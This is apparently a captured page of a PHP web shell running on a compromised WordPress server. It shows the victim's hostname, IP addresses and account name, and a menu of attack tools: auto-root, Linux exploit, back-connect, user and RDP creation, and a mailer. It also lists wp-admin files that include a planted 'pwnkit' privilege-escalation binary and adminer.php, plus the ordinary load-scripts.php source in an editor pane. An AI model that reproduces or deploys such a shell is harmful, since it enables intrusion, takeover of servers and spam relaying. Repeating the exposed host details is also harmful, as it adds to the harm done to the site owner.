Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.54
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
yvffpqmy /
public_html /
new /
wp-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
css
[ DIR ]
drwxr-xr-x
?;
images
[ DIR ]
drwxr-xr-x
?;
includes
[ DIR ]
drwxr-xr-x
?;
js
[ DIR ]
drwxr-xr-x
?;
maint
[ DIR ]
drwxr-xr-x
?;
network
[ DIR ]
drwxr-xr-x
?;
user
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-footer.php
2.77
KB
-rw-r--r--
admin-header.php
9.12
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
async-upload.php
5.47
KB
-rw-r--r--
authorize-application.php
10.09
KB
-rw-r--r--
credits.php
4.38
KB
-rw-r--r--
custom-background.php
489
B
-rw-r--r--
custom-header.php
499
B
-rw-r--r--
customize.php
11.01
KB
-rw-r--r--
edit-comments.php
14.38
KB
-rw-r--r--
edit-form-advanced.php
28.83
KB
-rw-r--r--
edit-form-blocks.php
14.6
KB
-rw-r--r--
edit-form-comment.php
8.34
KB
-rw-r--r--
edit-link-form.php
6.21
KB
-rw-r--r--
edit-tag-form.php
10.44
KB
-rw-r--r--
erase-personal-data.php
7.33
KB
-rw-r--r--
error_log
334.1
KB
-rw-r--r--
export-personal-data.php
7.75
KB
-rw-r--r--
freedoms.php
4.8
KB
-rw-r--r--
import.php
7.58
KB
-rw-r--r--
install-helper.php
6.8
KB
-rw-r--r--
install.php
17.77
KB
-rw-r--r--
link-manager.php
4.26
KB
-rw-r--r--
link-parse-opml.php
2.72
KB
-rw-r--r--
load-scripts.php
2.02
KB
-rw-r--r--
media-upload.php
3.58
KB
-rw-r--r--
ms-delete-site.php
4.5
KB
-rw-r--r--
ms-upgrade-network.php
219
B
-rw-r--r--
my-sites.php
4.74
KB
-rw-r--r--
options-discussion.php
15.92
KB
-rw-r--r--
options-general.php
21.65
KB
-rw-r--r--
options-head.php
621
B
-rw-r--r--
options-media.php
6.38
KB
-rw-r--r--
options-permalink.php
21.22
KB
-rw-r--r--
options-privacy.php
9.95
KB
-rw-r--r--
options-reading.php
9.94
KB
-rw-r--r--
options-writing.php
9.1
KB
-rw-r--r--
plugin-install.php
6.96
KB
-rw-r--r--
plugins.php
30
KB
-rw-r--r--
post-new.php
2.7
KB
-rw-r--r--
privacy-policy-guide.php
3.67
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
setup-config.php
17.48
KB
-rw-r--r--
site-health-info.php
3.99
KB
-rw-r--r--
theme-editor.php
16.87
KB
-rw-r--r--
theme-install.php
23.38
KB
-rw-r--r--
themes.php
47.92
KB
-rw-r--r--
update.php
12.79
KB
-rw-r--r--
upgrade-functions.php
341
B
-rw-r--r--
upload.php
14.9
KB
-rw-r--r--
widgets-form-blocks.php
5.12
KB
-rw-r--r--
widgets-form.php
19.29
KB
-rw-r--r--
widgets.php
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : load-scripts.php
<?php /* * The error_reporting() function can be disabled in php.ini. On systems where that is the case, * it's best to add a dummy function to the wp-config.php file, but as this call to the function * is run prior to wp-config.php loading, it is wrapped in a function_exists() check. */ if ( function_exists( 'error_reporting' ) ) { /* * Disable error reporting. * * Set this to error_reporting( -1 ) for debugging. */ error_reporting( 0 ); } // Set ABSPATH for execution. if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __DIR__ ) . '/' ); } define( 'WPINC', 'wp-includes' ); $protocol = $_SERVER['SERVER_PROTOCOL']; if ( ! in_array( $protocol, array( 'HTTP/1.1', 'HTTP/2', 'HTTP/2.0', 'HTTP/3' ), true ) ) { $protocol = 'HTTP/1.0'; } $load = $_GET['load']; if ( is_array( $load ) ) { ksort( $load ); $load = implode( '', $load ); } $load = preg_replace( '/[^a-z0-9,_-]+/i', '', $load ); $load = array_unique( explode( ',', $load ) ); if ( empty( $load ) ) { header( "$protocol 400 Bad Request" ); exit; } require ABSPATH . 'wp-admin/includes/noop.php'; require ABSPATH . WPINC . '/script-loader.php'; require ABSPATH . WPINC . '/version.php'; $expires_offset = 31536000; // 1 year. $out = ''; $wp_scripts = new WP_Scripts(); wp_default_scripts( $wp_scripts ); wp_default_packages_vendor( $wp_scripts ); wp_default_packages_scripts( $wp_scripts ); $etag = $wp_scripts->get_etag( $load ); if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) && stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ) === $etag ) { header( "$protocol 304 Not Modified" ); exit; } foreach ( $load as $handle ) { if ( ! array_key_exists( $handle, $wp_scripts->registered ) ) { continue; } $path = ABSPATH . $wp_scripts->registered[ $handle ]->src; $out .= get_file( $path ) . "\n"; } header( "Etag: $etag" ); header( 'Content-Type: application/javascript; charset=UTF-8' ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' ); header( "Cache-Control: public, max-age=$expires_offset" ); echo $out; exit;
Close